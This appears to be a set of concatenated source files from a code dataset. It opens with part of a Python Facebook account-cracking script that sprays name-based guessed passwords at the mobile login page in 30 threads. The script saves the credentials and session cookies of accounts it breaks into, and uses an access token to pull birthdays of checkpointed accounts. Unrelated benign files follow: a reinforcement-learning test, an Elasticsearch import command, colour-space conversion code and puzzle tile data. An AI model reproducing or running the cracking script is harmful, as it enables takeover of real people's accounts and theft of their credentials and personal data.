print '\r %s* --> %s|%s %s' % (H,user,pw,N)
wrt = ' [✓] %s|%s|%s' % (user,pw,kuki)
ok.append(wrt)
open('results/OK-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
continue
elif "checkpoint" in ses.cookies.get_dict().keys():
try:
nunu = open('token.txt').read()
cp_ttl = requests.get('https://graph.facebook.com/%s?access_token=%s'%(user,nunu)).json()['birthday']
month, day, year = cp_ttl.split('/')
month = tarikh_ttl[month]
print '\r %s* --> %s|%s|%s %s %s %s' % (K,user,pw,day,month,year,N)
wrt = ' [×] %s|%s|%s %s %s' % (user,pw,day,month,year)
cp.append(wrt)
open('results/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
except (KeyError, IOError):
month = ''
day = ''
year = ''
except:
pass
print '\r %s* --> %s|%s %s' % (K,user,pw,N)
wrt = ' [×] %s|%s' % (user,pw)
cp.append(wrt)
open('results/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
continue
loop += 1
def __mfb__(self, user, __axm__):
global ok,cp,loop
sys.stdout.write('\r [%s*%s] [CRACK] %s/%s -> OK-:%s - CP-:%s '%(O,N,loop,len(self.id),len(ok),len(cp))),
sys.stdout.flush()
for pw in __axm__:
pw = pw.lower()
try: os.mkdir('results')
except: pass
try:
_nunu = open('vau_ua.txt', 'r').read()
except (KeyError, IOError):
_nunu = 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ses = requests.Session()
ses.headers.update({"Host":"m.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":_nunu,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
p = ses.get("https://m.facebook.com")
b = ses.post("https://m.facebook.com/login.php", data={"email": user, "pass": pw, "login": "submit"})
if "c_user" in ses.cookies.get_dict().keys():
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
print '\r %s* --> %s|%s %s' % (H,user,pw,N)
wrt = ' [✓] %s|%s|%s' % (user,pw,kuki)
ok.append(wrt)
open('results/OK-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
continue
elif "checkpoint" in ses.cookies.get_dict().keys():
try:
nunu = open('token.txt').read()
cp_ttl = requests.get('https://graph.facebook.com/%s?access_token=%s'%(user,nunu)).json()['birthday']
month, day, year = cp_ttl.split('/')
month = tarikh_ttl[month]
print '\r %s* --> %s|%s|%s %s %s %s' % (K,user,pw,day,month,year,N)
wrt = ' [×] %s|%s|%s %s %s' % (user,pw,day,month,year)
cp.append(wrt)
open('results/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
except (KeyError, IOError):
month = ''
day = ''
year = ''
except:
pass
print '\r %s* --> %s|%s %s' % (K,user,pw,N)
wrt = ' [×] %s|%s' % (user,pw)
cp.append(wrt)
open('results/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
continue
loop += 1
def __pler__(self):
axm = raw_input('\n [*] METHOD : ')
if axm == '':
print "\n %s[%s×%s] DON'T LEAVE IT EMPTY BRO"%(N,M,N);self.__pler__()
elif axm in ('1', '01'):
print '\n [%s+%s] OK RESULTS ARE SAVED TO -> RESULTS/OK-%s-%s-%s.txt'%(O,N,ha, op, ta)
print ' [%s+%s] CP RESULTS ARE SAVED TO -> RESULTS/CP-%s-%s-%s.txt'%(O,N,ha, op, ta)
print '\n [%s!%s] YOU CAN TURN OFF MOBILE DATA TO PAUSE THE CRACK PROCESS\n'%(M,N)
with axim_xau(max_workers=30) as (__azimVau__):
for azmx in self.id:
try:
uid, name = azmx.split('<=>')
xz = name.split(' ')
if len(xz) == 3 or len(xz) == 4 or len(xz) == 5 or len(xz) == 6:
xnx = [name.lower(), xz[0]+xz[1].lower(), xz[0]+xz[1].lower()+"123", xz[0]+"123", xz[1].lower()+"123", xz[0].lower()+"1234", xz[0].lower()+"12345"]
else:
xnx = [name.lower(), xz[0]+xz[1].lower(), xz[0]+"123", xz[1].lower()+"123", xz[0].lower()+"1234", xz[0].lower()+"12345"]
__azimVau__.submit(self.__api__, uid, xnx)
except:
pass
os.remove(self.apk)
resu(ok,cp)
elif axm in ('2', '02'):
print '\n [%s+%s] OK RESULTS ARE SAVED TO -> RESULTS/OK-%s-%s-%s.txt'%(O,N,ha, op, ta)
print ' [%s+%s] CP RESULTS ARE SAVED TO -> RESULTS/CP-%s-%s-%s.txt'%(O,N,ha, op, ta)
print '\n [%s!%s] YOU CAN TURN OFF MOBILE DATA TO PAUSE THE CRACK PROCESS\n'%(M,N)
with axim_xau(max_workers=30) as (__azimVau__):
for azmx in self.id:
try:
uid, name = azmx.split('<=>')
xz = name.split(' ')
if len(xz) == 3 or len(xz) == 4 or len(xz) == 5 or len(xz) == 6:
xnx = [name.lower(), xz[0]+xz[1].lower(), xz[0]+xz[1].lower()+"123", xz[0]+"123", xz[1].lower()+"123", xz[0].lower()+"1234", xz[0].lower()+"12345"]
else:
xnx = [name.lower(), xz[0]+xz[1].lower(), xz[0]+"123", xz[1].lower()+"123", xz[0].lower()+"1234", xz[0].lower()+"12345"]
__azimVau__.submit(self.__mbasic__, uid, xnx)
except:
pass
os.remove(self.apk)
resu(ok,cp)
elif axm in ('3', '03'):
print '\n [%s+%s] OK RESULTS ARE SAVED TO -> RESULTS/OK-%s-%s-%s.txt'%(O,N,ha, op, ta)
print ' [%s+%s] CP RESULTS ARE SAVED TO -> RESULTS/CP-%s-%s-%s.txt'%(O,N,ha, op, ta)
print '\n [%s!%s] YOU CAN TURN OFF MOBILE DATA TO PAUSE THE CRACK PROCESS\n'%(M,N)
with axim_xau(max_workers=30) as (__azimVau__):
for azmx in self.id:
try:
uid, name = azmx.split('<=>')
xz = name.split(' ')
if len(xz) == 3 or len(xz) == 4 or len(xz) == 5 or len(xz) == 6:
xnx = [name.lower(), xz[0]+xz[1].lower(), xz[0]+xz[1].lower()+"123", xz[0]+"123", xz[1].lower()+"123", xz[0].lower()+"1234", xz[0].lower()+"12345"]
else:
xnx = [name.lower(), xz[0]+xz[1].lower(), xz[0]+"123", xz[1].lower()+"123", xz[0].lower()+"1234", xz[0].lower()+"12345"]
__azimVau__.submit(self.__mfb__, uid, xnx)
except:
pass
os.remove(self.apk)
resu(ok,cp)
else:
print '\n %s[%s×%s] WRONG INPUT'%(N,M,N);self.__pler__()
if __name__ == '__main__':
os.system('git pull')
main_menu()
| StarcoderdataPython |
1747304 | <reponame>Maltimore/garage
from garage.np.algos import CMAES
from garage.np.baselines import LinearFeatureBaseline
from garage.sampler import OnPolicyVectorizedSampler
from garage.tf.envs import TfEnv
from garage.tf.experiment import LocalTFRunner
from garage.tf.policies import CategoricalMLPPolicy
from tests.fixtures import snapshot_config, TfGraphTestCase
class TestCMAES(TfGraphTestCase):
def test_cma_es_cartpole(self):
"""Test CMAES with Cartpole-v1 environment."""
with LocalTFRunner(snapshot_config) as runner:
env = TfEnv(env_name='CartPole-v1')
policy = CategoricalMLPPolicy(name='policy',
env_spec=env.spec,
hidden_sizes=(32, 32))
baseline = LinearFeatureBaseline(env_spec=env.spec)
n_samples = 20
algo = CMAES(env_spec=env.spec,
policy=policy,
baseline=baseline,
max_path_length=100,
n_samples=n_samples)
runner.setup(algo, env, sampler_cls=OnPolicyVectorizedSampler)
runner.train(n_epochs=1, batch_size=1000, n_epoch_cycles=n_samples)
# No assertion on return because CMAES is not stable.
env.close()
| StarcoderdataPython |
3231399 | <filename>core/management/commands/import_test_data.py
from django.core.management.base import BaseCommand, CommandError
import pprint
import os
from core.management.commands.create_gui import add_required_data_to_db
import elasticsearch
class Command(BaseCommand):
def handle(self, *args, **options):
add_required_data_to_db()
dir_path = os.path.dirname(os.path.realpath(__file__))
data = {}
with open(os.path.join(dir_path, 'data', 'test_data.csv'), 'r') as fp:
for line in fp:
if line.startswith('#'):
continue
Variant, CHROM, POS, dbSNP_ID, REF, ALT, VariantType, Sample_ID, Sample_GT, ExonicFunc_refGene = line.strip().split(',')
if Variant not in data:
tmp_dict = {
'Variant': Variant,
'CHROM': CHROM,
'POS': POS,
'REF': REF,
'ALT': ALT,
'VariantType': VariantType,
'ExonicFunc_refGene': ExonicFunc_refGene,
'sample': []
}
if dbSNP_ID:
tmp_dict['dbSNP_ID'] = dbSNP_ID
data[Variant] = tmp_dict
sample_dict = {
'Sample_ID': Sample_ID,
'Sample_GT': Sample_GT
}
data[Variant]['sample'].append(sample_dict)
data_array = []
for key, values in data.items():
data_array.append(values)
es = elasticsearch.Elasticsearch(host='172.17.57.17', port=9200)
index_name = "test_data"
type_name = "test_data"
if es.indices.exists(index_name):
es.indices.delete(index_name)
es.indices.create(index_name)
es.cluster.health(wait_for_status="yellow")
body = {
type_name: {
"properties": {
"Variant": {
"type": "keyword"
},
"CHROM": {
"type": "keyword"
},
"POS": {
"type": "integer"
},
"dbSNP_ID": {
"type": "keyword"
},
"REF": {
"type": "keyword"
},
"ALT": {
"type": "keyword"
},
"VariantType": {
"type": "keyword"
},
"ExonicFunc_refGene": {
"type": "keyword"
},
"sample": {
"type": "nested",
"properties": {
"Sample_ID": {
"type": "keyword"
},
"Sample_GT": {
"type": "keyword"
}
}
}
}
}
}
es.indices.put_mapping(index=index_name, doc_type=type_name, body=body)
for body in data_array:
es.index(index=index_name, doc_type=type_name, body=body)
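        # --- Optional bulk-indexing sketch (added note, not part of the original command) ---
        # The loop above issues one HTTP request per variant document. elasticsearch-py
        # ships a bulk helper that batches the same documents; the commented sketch below
        # assumes the same `es`, `index_name`, `type_name` and `data_array` built above,
        # and is left commented out so the command's behaviour is unchanged.
        # from elasticsearch import helpers
        # actions = ({'_index': index_name, '_type': type_name, '_source': body}
        #            for body in data_array)
        # helpers.bulk(es, actions)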
| StarcoderdataPython |
34605 | import numpy as np
from .image_transforms import mat_to_gray
def rgb2hcv(Blue, Green, Red):
"""transform red green blue arrays to a color space
Parameters
----------
Blue : np.array, size=(m,n)
Blue band of satellite image
Green : np.array, size=(m,n)
Green band of satellite image
Red : np.array, size=(m,n)
Red band of satellite image
Returns
-------
    H : np.array, size=(m,n)
        hue, array with the dominant frequency
    C : np.array, size=(m,n)
        chroma, array with the amount of color
    V : np.array, size=(m,n)
        value, the luminance
See also
--------
rgb2yiq, rgb2ycbcr, rgb2hsi, rgb2xyz, rgb2lms
Notes
-----
.. [1] Smith, "Putting colors in order", Dr. Dobb’s Journal, pp 40, 1993.
.. [2] Tsai, "A comparative study on shadow compensation of color aerial
images in invariant color models", IEEE transactions in geoscience and
remote sensing, vol. 44(6) pp. 1661--1671, 2006.
"""
NanBol = Blue == 0
Blue, Green = mat_to_gray(Blue, NanBol), mat_to_gray(Green, NanBol)
    Red = mat_to_gray(Red, NanBol)
V = 0.3*(Red + Green + Blue)
H = np.arctan2( Red-Blue, np.sqrt(3)*(V-Green))
IN = abs(np.cos(H))<= 0.2
C = np.divide(V-Green, np.cos(H))
C2 = np.divide(Red-Blue, np.sqrt(3)*np.sin(H))
C[IN] = C2[IN]
return H, C, V
def rgb2yiq(Red, Green, Blue):
"""transform red, green, blue to luminance, inphase, quadrature values
Parameters
----------
Red : np.array, size=(m,n)
red band of satellite image
Green : np.array, size=(m,n)
green band of satellite image
Blue : np.array, size=(m,n)
blue band of satellite image
Returns
-------
Y : np.array, size=(m,n)
luminance
I : np.array, size=(m,n)
inphase
Q : np.array, size=(m,n)
quadrature
See also
--------
yiq2rgb, rgb2hcv, rgb2ycbcr, rgb2hsi, rgb2xyz, rgb2lms
Notes
-----
.. [1] <NAME> "Digital image processing", 1992.
"""
L = np.array([(+0.299, +0.587, +0.114),
(+0.596, -0.275, -0.321),
(+0.212, -0.523, +0.311)])
RGB = np.dstack((Red, Green, Blue))
YIQ = np.einsum('ij,klj->kli', L, RGB)
Y,I,Q = YIQ[:,:,0], YIQ[:,:,1], YIQ[:,:,2]
return Y, I, Q
def yiq2rgb(Y,I,Q):
"""transform luminance, inphase, quadrature values to red, green, blue
Parameters
----------
    Y : np.array, size=(m,n)
        luminance
    I : np.array, size=(m,n)
        inphase
    Q : np.array, size=(m,n)
        quadrature
    Returns
    -------
    Red : np.array, size=(m,n)
        red band of satellite image
    Green : np.array, size=(m,n)
        green band of satellite image
    Blue : np.array, size=(m,n)
        blue band of satellite image
See also
--------
rgb2yiq
Notes
-----
.. [1] <NAME> "Digital image processing", 1992.
"""
L = np.array([(+0.299, +0.587, +0.114),
(+0.596, -0.275, -0.321),
(+0.212, -0.523, +0.311)])
Linv = np.linalg.inv(L)
YIQ = np.dstack((Y, I, Q))
RGB = np.einsum('ij,klj->kli', Linv, YIQ)
R,G,B = RGB[:,:,0], RGB[:,:,1], RGB[:,:,2]
return R, G, B
def rgb2ycbcr(Red, Green, Blue):
"""transform red, green, blue arrays to luna and chroma values
Parameters
----------
Red : np.array, size=(m,n)
red band of satellite image
Green : np.array, size=(m,n)
green band of satellite image
Blue : np.array, size=(m,n)
blue band of satellite image
Returns
-------
Y : np.array, size=(m,n)
luma
Cb : np.array, size=(m,n)
chroma
Cr : np.array, size=(m,n)
chroma
See also
--------
rgb2hcv, rgb2yiq, rgb2hsi, rgb2xyz, rgb2lms
Notes
-----
.. [1] Tsai, "A comparative study on shadow compensation of color aerial
images in invariant color models", IEEE transactions in geoscience and
remote sensing, vol. 44(6) pp. 1661--1671, 2006.
"""
L = np.array([(+0.257, +0.504, +0.098),
(-0.148, -0.291, +0.439),
(+0.439, -0.368, -0.071)])
C = np.array([16, 128, 128])/2**8
RGB = np.dstack((Red, Green, Blue))
YCC = np.einsum('ij,klj->kli', L, RGB)
del RGB
Y = YCC[:,:,0] + C[0]
Cb= YCC[:,:,1] + C[1]
Cr= YCC[:,:,2] + C[2]
return Y, Cb, Cr
def rgb2hsi(Red, Green, Blue):
"""transform red, green, blue arrays to hue, saturation, intensity arrays
Parameters
----------
Red : np.array, size=(m,n)
red band of satellite image
Green : np.array, size=(m,n)
green band of satellite image
Blue : np.array, size=(m,n)
blue band of satellite image
Returns
-------
Hue : np.array, size=(m,n), range=0...1
Hue
Sat : np.array, size=(m,n), range=0...1
Saturation
Int : np.array, size=(m,n), range=0...1
Intensity
See also
--------
erdas2hsi, rgb2hcv, rgb2yiq, rgb2ycbcr, rgb2xyz, rgb2lms
Notes
-----
.. [1] Tsai, "A comparative study on shadow compensation of color aerial
images in invariant color models", IEEE transactions in geoscience and
remote sensing, vol. 44(6) pp. 1661--1671, 2006.
.. [2] Pratt, "Digital image processing" Wiley, 1991.
"""
if np.ptp(Red.flatten())>1:
Red = mat_to_gray(Red)
if np.ptp(Green.flatten())>1:
Green = mat_to_gray(Green)
if np.ptp(Blue.flatten())>1:
Blue = mat_to_gray(Blue)
Tsai = np.array([(1/3, 1/3, 1/3),
(-np.sqrt(6)/6, -np.sqrt(6)/6, -np.sqrt(6)/3),
(1/np.sqrt(6), 2/-np.sqrt(6), 0)])
RGB = np.dstack((Red, Green, Blue))
HSI = np.einsum('ij,klj->kli', Tsai, RGB)
Int = HSI[:,:,0]
Sat = np.sqrt(HSI[:,:,1] ** 2 + HSI[:,:,2] ** 2)
Hue = np.arctan2(HSI[:,:,1], HSI[:,:,2])/np.pi
Hue = np.remainder(Hue, 1) # bring to from -.5...+.5 to 0...1 range
return Hue, Sat, Int
def hsi2rgb(Hue, Sat, Int):  # todo
    """transform hue, saturation, intensity arrays back to red, green, blue
    (work in progress: the sector logic below has not been verified against
    rgb2hsi and may still need revision)
    """
Red,Green,Blue = np.zeros_like(Hue), np.zeros_like(Hue), np.zeros_like(Hue)
Class = np.ceil(Hue/3)
Color = 1 + Sat * np.divide(Hue, np.cos(np.radians(60)))
# red-green space
Sel = Class==1
Blue[Sel] = np.divide(1 - Sat[Sel], 3)
Red[Sel] = np.divide(Int[Sel] + Color[Sel], 3)
Green[Sel] = 1 - (Red[Sel] + Blue[Sel])
# green-blue space
Sel = Class==2
Red[Sel] = np.divide(1 - Sat[Sel], 3)
Green[Sel] = np.divide(Int[Sel] + Color[Sel], 3)
Blue[Sel] = 1 - (Green[Sel] + Red[Sel])
# blue-red space
Sel = Class==3
Green[Sel] = np.divide(1 - Sat[Sel], 3)
Blue[Sel] = np.divide(Int[Sel] + Color[Sel], 3)
Red[Sel] = 1 - (Blue[Sel] + Green[Sel])
return Red, Green, Blue
def erdas2hsi(Blue, Green, Red):
"""transform red, green, blue arrays to hue, saturation, intensity arrays
Parameters
----------
Blue : np.array, size=(m,n)
blue band of satellite image
Green : np.array, size=(m,n)
green band of satellite image
Red : np.array, size=(m,n)
red band of satellite image
Returns
-------
Hue : np.array, size=(m,n), float
hue
Sat : np.array, size=(m,n), float
saturation
Int : np.array, size=(m,n), float
intensity
See also
--------
rgb2hsi
Notes
-----
.. [1] ERDAS, "User handbook", 2013.
"""
if np.ptp(Red.flatten())>1:
Red = mat_to_gray(Red)
if np.ptp(Green.flatten())>1:
Green = mat_to_gray(Green)
if np.ptp(Blue.flatten())>1:
Blue = mat_to_gray(Blue)
Stack = np.dstack((Blue, Green, Red))
min_Stack = np.amin(Stack, axis=2)
max_Stack = np.amax(Stack, axis=2)
Int = (max_Stack + min_Stack)/2
Sat = np.copy(Blue)
Sat[Int==0] = 0
Sat[Int<=.5] = (max_Stack[Int<=.5] -
min_Stack[Int<=.5]) / (max_Stack[Int<=.5] +
min_Stack[Int<=.5])
Sat[Int>.5] = (max_Stack[Int>.5] -
min_Stack[Int>.5]) / ( 2 - max_Stack[Int>.5] +
min_Stack[Int>.5])
Hue = np.copy(Blue)
Hue[Blue==max_Stack] = (1/6) *(6
+ Green[Blue==max_Stack]
- Red[Blue==max_Stack])
Hue[Green==max_Stack] = (1/6) *(4
+ Red[Green==max_Stack]
- Blue[Green==max_Stack])
Hue[Red==max_Stack] = (1/6) *(2
+ Blue[Red==max_Stack]
- Green[Red==max_Stack])
return Hue, Sat, Int
def rgb2xyz(Red, Green, Blue, method='reinhardt'):
"""transform red, green, blue arrays to XYZ tristimulus values
Parameters
----------
Red : np.array, size=(m,n)
red band of satellite image
Green : np.array, size=(m,n)
green band of satellite image
Blue : np.array, size=(m,n)
blue band of satellite image
method :
'reinhardt'
XYZitu601-1 axis
'ford'
D65 illuminant
Returns
-------
X : np.array, size=(m,n)
Y : np.array, size=(m,n)
Z : np.array, size=(m,n)
See also
--------
rgb2hcv, rgb2ycbcr, rgb2hsi, rgb2yiq, rgb2lms, xyz2lms
Notes
-----
.. [1] <NAME> al. "Color transfer between images" IEEE Computer graphics
and applications vol.21(5) pp.34-41, 2001.
.. [2] <NAME>. "Color space conversion", pp. 1--31, 1998.
"""
if method=='ford':
M = np.array([(0.4124564, 0.3575761, 0.1804375),
(0.2126729, 0.7151522, 0.0721750),
(0.0193339, 0.1191920, 0.9503041)])
else:
M = np.array([(0.5141, 0.3239, 0.1604),
(0.2651, 0.6702, 0.0641),
(0.0241, 0.1228, 0.8444)])
RGB = np.dstack((Red, Green, Blue))
XYZ = np.einsum('ij,klj->kli', M, RGB)
X,Y,Z = XYZ[:,:,0], XYZ[:,:,1], XYZ[:,:,2]
return X, Y, Z
def xyz2lms(X, Y, Z):
"""transform XYZ tristimulus arrays to LMS values
Parameters
----------
X : np.array, size=(m,n)
modified XYZitu601-1 axis
Y : np.array, size=(m,n)
modified XYZitu601-1 axis
Z : np.array, size=(m,n)
modified XYZitu601-1 axis
Returns
-------
L : np.array, size=(m,n)
M : np.array, size=(m,n)
S : np.array, size=(m,n)
See also
--------
rgb2hcv, rgb2ycbcr, rgb2hsi, rgb2yiq, rgb2lms
Notes
-----
.. [1] <NAME> al. "Color transfer between images" IEEE Computer graphics
and applications vol.21(5) pp.34-41, 2001.
"""
N = np.array([(+0.3897, +0.6890, -0.0787),
(-0.2298, +1.1834, +0.0464),
                  (+0.0000, +0.0000, +1.0000)])
RGB = np.dstack((X, Y, Z))
LMS = np.einsum('ij,klj->kli', N, RGB)
L,M,S = LMS[:,:,0], LMS[:,:,1], LMS[:,:,2]
return L, M, S
def xyz2lab(X, Y, Z, th=0.008856):
"""transform XYZ tristimulus arrays to Lab values
Parameters
----------
X : np.array, size=(m,n)
Y : np.array, size=(m,n)
Z : np.array, size=(m,n)
Returns
-------
L : np.array, size=(m,n)
a : np.array, size=(m,n)
b : np.array, size=(m,n)
See also
--------
rgb2xyz, xyz2lms, lms2lch
Notes
-----
.. [1] Ford & Roberts. "Color space conversion", pp. 1--31, 1998.
.. [2] Silva et al. "Near real-time shadow detection and removal in aerial
motion imagery application" ISPRS journal of photogrammetry and remote
sensing, vol.140 pp.104--121, 2018.
"""
Xn,Yn,Zn = 95.047, 100.00, 108.883 # D65 illuminant
YYn = Y/Yn
    L_1 = 116* YYn**(1/3.) - 16
    L_2 = 903.3 * YYn
    L = L_1
    L[YYn<=th] = L_2[YYn<=th]
    def f(tau, th):
        fx = tau**(1/3.)
        fx[tau<=th] = 7.787*tau[tau<=th] + 16/116
        return fx
    a = 500*( f(X/Xn, th) - f(Y/Yn, th) )
    b = 200*( f(Y/Yn, th) - f(Z/Zn, th) )
return L, a, b
def lab2lch(L, a, b):
"""transform XYZ tristimulus arrays to Lab values
Parameters
----------
L : np.array, size=(m,n)
a : np.array, size=(m,n)
b : np.array, size=(m,n)
Returns
-------
C : np.array, size=(m,n)
h : np.array, size=(m,n)
See also
--------
rgb2xyz, xyz2lms, xyz2lab
Notes
-----
.. [1] Ford & Roberts. "Color space conversion", pp. 1--31, 1998.
.. [2] Silva et al. "Near real-time shadow detection and removal in aerial
motion imagery application" ISPRS journal of photogrammetry and remote
sensing, vol.140 pp.104--121, 2018.
"""
C = np.sqrt( a**2 + b**2)
# calculate angle, and let it range from 0...1
    h = np.remainder(np.arctan2(b, a), 2*np.pi) / (2*np.pi)
return C, h
def rgb2lms(Red, Green, Blue):
"""transform red, green, blue arrays to XYZ tristimulus values
Parameters
----------
Red : np.array, size=(m,n)
red band of satellite image
Green : np.array, size=(m,n)
green band of satellite image
Blue : np.array, size=(m,n)
blue band of satellite image
Returns
-------
L : np.array, size=(m,n)
M : np.array, size=(m,n)
S : np.array, size=(m,n)
See also
--------
rgb2hcv, rgb2ycbcr, rgb2hsi, rgb2yiq, rgb2xyz, xyz2lms
Notes
-----
.. [1] Reinhard et al. "Color transfer between images", 2001.
"""
I = np.array([(0.3811, 0.5783, 0.0402),
(0.1967, 0.7244, 0.0782),
(0.0241, 0.1228, 0.8444)])
RGB = np.dstack((Red, Green, Blue))
LMS = np.einsum('ij,klj->kli', I, RGB)
L,M,S = LMS[:,:,0], LMS[:,:,1], LMS[:,:,2]
return L, M, S
def lms2lab(L, M, S):
"""transform L, M, S arrays to lab color space
Parameters
----------
L : np.array, size=(m,n)
M : np.array, size=(m,n)
S : np.array, size=(m,n)
Returns
-------
l : np.array, size=(m,n)
a : np.array, size=(m,n)
b : np.array, size=(m,n)
See also
--------
rgb2hcv, rgb2ycbcr, rgb2hsi, rgb2yiq, rgb2xyz, xyz2lms
Notes
-----
.. [1] Reinhard et al. "Color transfer between images", 2001.
"""
I = np.matmul(np.array([(1/np.sqrt(3), 0, 0),
(0, 1/np.sqrt(6), 0),
(0, 0, 1/np.sqrt(2))]),
np.array([(+1, +1, +1),
(+1, +1, -2),
(+1, -1, +0)]))
LMS = np.dstack((L, M, S))
lab = np.einsum('ij,klj->kli', I, LMS)
l,a,b = lab[:,:,0], lab[:,:,1], lab[:,:,2]
return l, a, b
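# --- Illustrative helper (added as an example; not part of the original module) ---
# A minimal round-trip check of the YIQ helpers above: converting to YIQ and back
# with the inverse matrix should reproduce the input up to floating point error.
# The random 4x4 test image is an assumption made purely for demonstration.
def _yiq_roundtrip_demo():
    Red, Green, Blue = np.random.rand(3, 4, 4)
    Y, I, Q = rgb2yiq(Red, Green, Blue)
    R2, G2, B2 = yiq2rgb(Y, I, Q)
    return np.allclose(Red, R2) and np.allclose(Green, G2) and np.allclose(Blue, B2)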
| StarcoderdataPython |
1638948 | #sed 's/^/"/ ; s/$/",/ ; s/Tile // ; s/:",/":[/ ; s/"",/],/ ; s/\./0/g ; s/#/1/g ' < advent-20.raw > advent-20.py
m={
"1217":[
"0100001001",
"1010000111",
"1101000010",
"1100011100",
"1110010010",
"0100011000",
"1010011000",
"1000101100",
"1001100001",
"0110100100",
],
"2357":[
"0000010101",
"1000010001",
"0000000100",
"0010000011",
"0000000000",
"1010100011",
"1010000111",
"0001000010",
"1011000000",
"1001111111",
],
"1399":[
"0110111111",
"1100000001",
"1011000100",
"0000001001",
"0000001000",
"0100000000",
"0000101000",
"0000101000",
"1100010110",
"1111011111",
],
"3733":[
"1001010101",
"1000111001",
"1001011110",
"0001000000",
"1000001001",
"0001010000",
"1100001001",
"1100010000",
"0100001000",
"1010001001",
],
"2503":[
"1001001111",
"0000001011",
"1000100011",
"0000000000",
"0101110101",
"0000000100",
"0000010001",
"1000001101",
"1000000000",
"1001011010",
],
"1511":[
"1010110110",
"1111100101",
"0100000000",
"1110010100",
"1001011011",
"0100001011",
"1000010000",
"1000011000",
"0000000001",
"1001100011",
],
"3583":[
"1101100101",
"0010111100",
"1000000111",
"1010011011",
"1000000011",
"1010010100",
"0101110010",
"0100000100",
"1000000101",
"1011000001",
],
"1637":[
"1011100101",
"1001000001",
"0000010001",
"0000100001",
"0001000010",
"0000100001",
"0000010100",
"1011000001",
"1001000100",
"1100101111",
],
"1453":[
"0110100110",
"0000000000",
"1110100101",
"1000111000",
"0011110001",
"1010000000",
"1000100001",
"1001001100",
"1000000001",
"0000001110",
],
"1153":[
"1000100110",
"1000000001",
"0010100010",
"0100001110",
"1010110001",
"1000010011",
"1100000011",
"0010000000",
"1010000001",
"1001101100",
],
"3701":[
"0011101010",
"0001100001",
"1001100001",
"1000000000",
"1101110001",
"1001111011",
"0000110000",
"1010100001",
"0000000000",
"0111110000",
],
"2179":[
"0101000011",
"0010011011",
"1100100110",
"1110100000",
"0010011000",
"1000100011",
"0000001001",
"1100010010",
"0010101100",
"1011100001",
],
"1999":[
"0100010111",
"0000000000",
"1000000100",
"0100000010",
"0101100000",
"1110001000",
"0000000110",
"1000000000",
"0011000001",
"1001101101",
],
"2333":[
"0101000010",
"0010000000",
"1001000100",
"0000000100",
"0000100010",
"0001011010",
"0100000000",
"1010000101",
"1100000000",
"1001101000",
],
"1733":[
"0111100101",
"0100101001",
"1001100001",
"1110011101",
"0111010111",
"1010110001",
"0000100001",
"1000010100",
"0000100101",
"0000010000",
],
"3217":[
"1111101101",
"1000000101",
"0000000001",
"1010000011",
"1100000010",
"1001010001",
"0110000000",
"1001000001",
"1010100100",
"0001010001",
],
"1471":[
"0001000001",
"1000100010",
"1101000010",
"1011000011",
"1010110000",
"0011100011",
"1010001100",
"0100100011",
"1011000011",
"0010010011",
],
"2089":[
"1110110000",
"0011000111",
"0000000010",
"1000000001",
"0001011011",
"0000001100",
"1110001000",
"1000000001",
"0010000000",
"0000010110",
],
"2909":[
"0000011110",
"0100100111",
"0110010110",
"0000000010",
"1000010000",
"1101011100",
"0110010011",
"0000000100",
"1000000000",
"1000011111",
],
"3433":[
"1010010000",
"1000000001",
"1010101010",
"0111011000",
"1000010101",
"0100001011",
"0100001100",
"0100000001",
"1000001000",
"0111000010",
],
"3049":[
"0001000000",
"1000110011",
"1100000101",
"1010000101",
"0001000011",
"0000001001",
"1000000011",
"0000110001",
"0101011000",
"0111111000",
],
"2143":[
"0111111000",
"0110100111",
"1101100101",
"0100001000",
"0101100010",
"1000100001",
"1100010000",
"1100110100",
"1000011000",
"1101000101",
],
"3299":[
"1001101100",
"0000000000",
"1001010000",
"0000000110",
"0000000000",
"0010001100",
"0100001000",
"1001100001",
"1000100001",
"0101011111",
],
"2803":[
"0010000111",
"0010110100",
"0000001110",
"0000010000",
"1001101000",
"0110001001",
"1000010000",
"0001000000",
"0000001011",
"0011100101",
],
"2311":[
"1001100001",
"0000010000",
"0100110011",
"1001110000",
"1001001010",
"0000000000",
"0010000101",
"1001101011",
"0111010100",
"0011011010",
],
"1123":[
"1011110001",
"0000001111",
"0010010001",
"0010100111",
"1110001001",
"0101000001",
"0000010110",
"1010100101",
"0000000011",
"0001100111",
],
"1777":[
"0011111110",
"1100000000",
"0001001011",
"0000000011",
"1100000011",
"1100001101",
"1000000100",
"0100010010",
"1001011110",
"0011100010",
],
"1321":[
"0111000110",
"1000000010",
"1110000100",
"0100110100",
"1010011011",
"1110100111",
"1000010001",
"1010101111",
"0000000001",
"0110000001",
],
"2287":[
"0000010010",
"0100111111",
"0010100000",
"1000000001",
"1001010011",
"0100001010",
"1010100001",
"0000100000",
"0010000011",
"0101010101",
],
"3727":[
"0101010011",
"1101001010",
"1100000011",
"1100001101",
"0000010011",
"1000100001",
"0100001000",
"0000101110",
"0010000001",
"0111101101",
],
"1607":[
"0000000101",
"1000001000",
"1000001010",
"0100101101",
"1010100000",
"1000001001",
"0000011001",
"0000011101",
"0000100000",
"1001001111",
],
"1327":[
"0110001010",
"1110001000",
"1100000001",
"0000000111",
"1010000001",
"1001000001",
"0000010101",
"1000000001",
"1010010100",
"1010011011",
],
"3889":[
"0101010010",
"0011000101",
"1000100011",
"1000101011",
"1010000000",
"1110000001",
"0000000011",
"1001000010",
"0000010001",
"1111000100",
],
"1447":[
"0011101101",
"0001010000",
"0110000001",
"0000011000",
"0000001000",
"1001010101",
"1010101101",
"1001000101",
